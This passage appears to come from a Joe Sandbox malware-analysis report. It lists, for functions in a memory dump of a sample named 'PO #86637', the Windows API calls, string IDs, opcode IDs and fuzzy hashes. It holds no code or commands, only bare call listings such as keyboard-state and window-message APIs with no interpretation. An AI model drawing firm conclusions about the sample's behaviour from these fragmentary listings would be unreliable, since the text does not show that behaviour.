                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend$CharNext
                      • String ID:
                      • API String ID: 1350042424-0
                      • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                      • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                      • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                      • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                      APIs
                        • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                        • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                      • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                      • _wcscpy.LIBCMT ref: 004787E5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                      • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                      • API String ID: 3052893215-2127371420
                      • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                      • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                      • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                      • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                      APIs
                      • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                      • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                      • __swprintf.LIBCMT ref: 0045E7F7
                      • _wprintf.LIBCMT ref: 0045E8B3
                      • _wprintf.LIBCMT ref: 0045E8D7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                      • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                      • API String ID: 2295938435-2354261254
                      • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                      • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                      • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                      • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __swprintf_wcscpy$__i64tow__itow
                      • String ID: %.15g$0x%p$False$True
                      • API String ID: 3038501623-2263619337
                      • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                      • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                      • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                      • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                      APIs
                      • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                      • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                      • __swprintf.LIBCMT ref: 0045E5F6
                      • _wprintf.LIBCMT ref: 0045E6A3
                      • _wprintf.LIBCMT ref: 0045E6C7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                      • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                      • API String ID: 2295938435-8599901
                      • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                      • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                      • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                      • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                      APIs
                      • timeGetTime.WINMM ref: 00443B67
                        • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                      • Sleep.KERNEL32(0000000A), ref: 00443B9F
                      • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                      • SetActiveWindow.USER32(?), ref: 00443BEC
                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                      • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                      • Sleep.KERNEL32(000000FA), ref: 00443C2D
                      • IsWindow.USER32(?), ref: 00443C3A
                      • EndDialog.USER32(?,00000000), ref: 00443C4C
                        • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                        • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                        • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                      • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                      • String ID: BUTTON
                      • API String ID: 1834419854-3405671355
                      • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                      • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                      • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                      • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                      • LoadStringW.USER32(00000000), ref: 00454040
                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                      • _wprintf.LIBCMT ref: 00454074
                      • __swprintf.LIBCMT ref: 004540A3
                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                      • API String ID: 455036304-4153970271
                      • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                      • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                      • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                      • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                      APIs
                      • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                      • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                      • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                      • _memmove.LIBCMT ref: 00467EB8
                      • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                      • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                      • _memmove.LIBCMT ref: 00467F6C
                      • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                      • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                      • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                      • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                      • String ID:
                      • API String ID: 2170234536-0
                      • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                      • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                      • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                      • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                      APIs
                      • GetKeyboardState.USER32(?), ref: 00453CE0
                      • SetKeyboardState.USER32(?), ref: 00453D3B
                      • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                      • GetKeyState.USER32(000000A0), ref: 00453D75
                      • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                      • GetKeyState.USER32(000000A1), ref: 00453DB5
                      • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                      • GetKeyState.USER32(00000011), ref: 00453DEF
                      • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                      • GetKeyState.USER32(00000012), ref: 00453E26
                      • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                      • GetKeyState.USER32(0000005B), ref: 00453E5D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: State$Async$Keyboard
                      • String ID:
                      • API String ID: 541375521-0
                      • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                      • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                      • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                      • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                      APIs
                      • GetDlgItem.USER32(?,00000001), ref: 004357DB
                      • GetWindowRect.USER32(00000000,?), ref: 004357ED
                      • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                      • GetDlgItem.USER32(?,00000002), ref: 0043586A
                      • GetWindowRect.USER32(00000000,?), ref: 0043587C
                      • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                      • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                      • GetWindowRect.USER32(00000000,?), ref: 004358EE
                      • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                      • GetDlgItem.USER32(?,000003EA), ref: 00435941
                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Window$ItemMoveRect$Invalidate
                      • String ID:
                      • API String ID: 3096461208-0
                      • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                      • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                      • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                      • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                      APIs
                      • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                      • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                      • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                      • DeleteObject.GDI32(?), ref: 0047151E
                      • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                      • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                      • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                      • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                      • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                      • DeleteObject.GDI32(?), ref: 004715EA
                      • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                      • String ID:
                      • API String ID: 3218148540-0
                      • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                      • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                      • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                      • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                      • String ID:
                      • API String ID: 136442275-0
                      • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                      • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                      • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                      • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                      APIs
                      • _wcsncpy.LIBCMT ref: 00467490
                      • _wcsncpy.LIBCMT ref: 004674BC
                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                      • _wcstok.LIBCMT ref: 004674FF
                        • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                      • _wcstok.LIBCMT ref: 004675B2
                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                      • _wcslen.LIBCMT ref: 00467793
                      • _wcscpy.LIBCMT ref: 00467641
                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                      • _wcslen.LIBCMT ref: 004677BD
                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                        • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                      • String ID: X
                      • API String ID: 3104067586-3081909835
                      APIs
                      • OleInitialize.OLE32(00000000), ref: 0046CBC7
                      • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                      • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                      • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                      • _wcslen.LIBCMT ref: 0046CDB0
                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                      • CoTaskMemFree.OLE32(?), ref: 0046CE42
                      • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                        • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                        • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                        • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                      Strings
                      • NULL Pointer assignment, xrefs: 0046CEA6
                      Similarity
                      • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                      • String ID: NULL Pointer assignment
                      • API String ID: 440038798-2785691316
                      APIs
                      • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                      • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                      • _wcslen.LIBCMT ref: 004610A3
                      • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                      • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                      • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                      • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                      • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                      • GetWindowRect.USER32(?,?), ref: 00461248
                        • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                      Similarity
                      • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                      • String ID: ThumbnailClass
                      • API String ID: 4136854206-1241985126
                      APIs
                      • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                      • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                      • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                      • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                      • GetClientRect.USER32(?,?), ref: 00471A1A
                      • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                      • DestroyIcon.USER32(?), ref: 00471AF4
                      Similarity
                      • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                      • String ID: 2
                      • API String ID: 1331449709-450215437
                      APIs
